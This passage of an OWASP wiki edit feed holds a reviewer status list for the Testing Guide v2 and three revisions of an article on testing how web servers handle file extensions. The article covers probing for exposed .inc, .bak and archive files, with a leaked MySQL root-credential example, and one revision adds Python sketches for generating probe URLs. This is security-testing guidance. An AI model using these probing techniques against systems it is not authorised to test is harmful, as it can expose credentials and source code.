0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Authentication-Testing-Index-Page.aspx Authentication Testing Index]&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Default-or-Guessable-User-Account-Testing-AoC.aspx Default or guessable user account review]&lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Brute-Force-Testing-AoC.aspx Brute Force review]&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Bypassing-Authentication-Schema-AoC.aspx Bypass Authentication review]&lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Directory-Traversal-Testing-AOC.aspx Directory Traversal Testing review]&lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Vulnerable-Remember-Password-and-Pwd-Reset-AoC.aspx Vulnerable Reset Password review]&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Logout-and-Browser-Cache-Management-Testing-AoC.aspx Logout and Browser Cache Management Testing review]&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%)&lt;br /&gt;
** 4.5.2 Cookie and Session token Manipulation (100%)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.2.2 Oracle testing (0%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. '''tools?'''&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (0%) '''TD (not enough information)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviewed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section still to be completed?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%) Reviewed by MM&lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%) Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.6 Failure to Release Resources 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewed by Revelli&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%) Reviewed by Meucci. '''Need to add code examples, images and proof of impersonation'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We still have to write this section; I consider it unfinished.&lt;br /&gt;
0 of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix A: Testing Tools --&amp;gt;...'''&lt;br /&gt;
1 article of 1: needs updating by searching the whole guide for the Tools paragraphs&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: needs updating by searching the whole guide for the Tools paragraphs&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola'''&lt;br /&gt;
1 article of 1: Needs to be updated&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers' Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the English language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles in chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to discuss Gray Box Testing or other sections, so we can eliminate them.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like all the referenced URLs to be visible, because I also have to produce a PDF version of the Guide.)&lt;br /&gt;
I agree with Stefano: we should use a reference format like this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check the cross-references to the other articles of the Guide and to the other OWASP projects.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12558</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12558"/>
				<updated>2006-11-14T09:15:40Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used by web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester with useful information about the underlying technologies used in a web application and greatly simplifies the task of determining the attack scenarios applicable to those particular technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, misconfiguration of web servers could easily reveal confidential information such as access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be performed on a per-directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify which directories allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous access to certain kinds of files can be. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To sum it up, in order to identify files having a given extensions, a mix of techniques can be employed, including: Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), querying search engines (see [[Spidering and googling AoC]]). See also [[Old file testing AoC]] which deals with the security issues related to &amp;quot;forgotten&amp;quot; files.&lt;br /&gt;
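As a complement to the tools listed here, the probing workflow of this section can be sketched in a short script. This is only an illustrative sketch: the base URL, the base names, and the word lists are hypothetical, and the two extension sets simply mirror the two checklists given above.

```python
# Sketch: build candidate URLs per directory by pairing base names with
# risky extensions, and triage each extension per the two lists above.
# All names and URLs here are hypothetical examples.
from itertools import product

# Extensions that should never be served directly (first list above)
SENSITIVE = {".asa", ".inc", ".bak", ".old"}
# Extensions that may be served but must be reviewed for leftovers (second list)
REVIEW = {".zip", ".tar", ".gz", ".tgz", ".rar", ".java", ".txt", ".pdf",
          ".doc", ".rtf", ".xls", ".ppt"}

def candidate_urls(base, names, extensions):
    """One URL to probe per (name, extension) pair, under a given directory."""
    return [f"{base.rstrip('/')}/{n}{e}" for n, e in product(names, extensions)]

def classify(ext):
    """Triage an extension according to the section's two checklists."""
    if ext in SENSITIVE:
        return "never-serve"
    if ext in REVIEW:
        return "review"
    return "unknown"

urls = candidate_urls("http://www.example.com/app",
                      ["connection", "config"], [".inc", ".bak"])
```

The resulting URL list can then be fed to a mirroring or fetching tool (such as wget or curl, mentioned below) to observe how each extension is actually served.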
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extension handling amounts to checking the configurations of the web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
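As a sketch of this configuration review, assuming an Apache-style configuration: AddHandler and AddType are real Apache directives that map extensions to handlers and MIME types, but the sample configuration text below is made up for illustration.

```python
# Sketch (assumed Apache-style config): extract which extensions are mapped
# to server-side handlers or types, by scanning AddHandler/AddType directives.
# The CONF text is a fabricated example, not a real server's configuration.
import re

CONF = """
AddHandler cgi-script .cgi .pl
AddType application/x-httpd-php .php .inc
"""

def handler_map(conf_text):
    """Map each extension to the directive and handler/type it is bound to."""
    mapping = {}
    for directive, target, exts in re.findall(
            r"^(AddHandler|AddType)\s+(\S+)\s+(.+)$", conf_text, re.M):
        for ext in exts.split():
            mapping[ext] = (directive, target)
    return mapping

m = handler_map(CONF)
```

An extension absent from such mappings would typically fall back to being served as a static file, which is exactly the condition that exposes source code such as the connection.inc example above.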
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto, check for the existence of well-known web directories. They may also allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se); alternatively, search for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12557</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12557"/>
				<updated>2006-11-14T09:12:42Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used by web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester with useful information about the underlying technologies used in a web application and greatly simplifies the task of determining the attack scenarios applicable to those particular technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, misconfiguration of web servers could easily reveal confidential information such as access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be performed on a per-directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify which directories allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous access to certain kinds of files can be. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions. &amp;lt;br&amp;gt;&lt;br /&gt;
To sum up, in order to identify files having a given extension, a mix of techniques can be employed, including: vulnerability scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), and querying search engines (see [[Spidering and googling AoC]]). See also [[Old file testing AoC]], which deals with the security issues related to &amp;quot;forgotten&amp;quot; files.&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extension handling amounts to checking the configurations of the web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto, check for the existence of well-known web directories. They may also allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se); alternatively, search for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12556</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12556"/>
				<updated>2006-11-14T09:07:17Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used by web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester with useful information about the underlying technologies used in a web application and greatly simplifies the task of determining the attack scenarios applicable to those particular technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, misconfiguration of web servers could easily reveal confidential information such as access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be performed on a per-directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify which directories allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous access to certain kinds of files can be. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions. &amp;lt;br&amp;gt;&lt;br /&gt;
To sum up, in order to identify files having a given extension, a mix of techniques can be employed, including: vulnerability scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), and querying search engines (see [[Spidering and googling AoC]]). See also [[Old file testing AoC]].&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extension handling amounts to checking the configurations of the web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
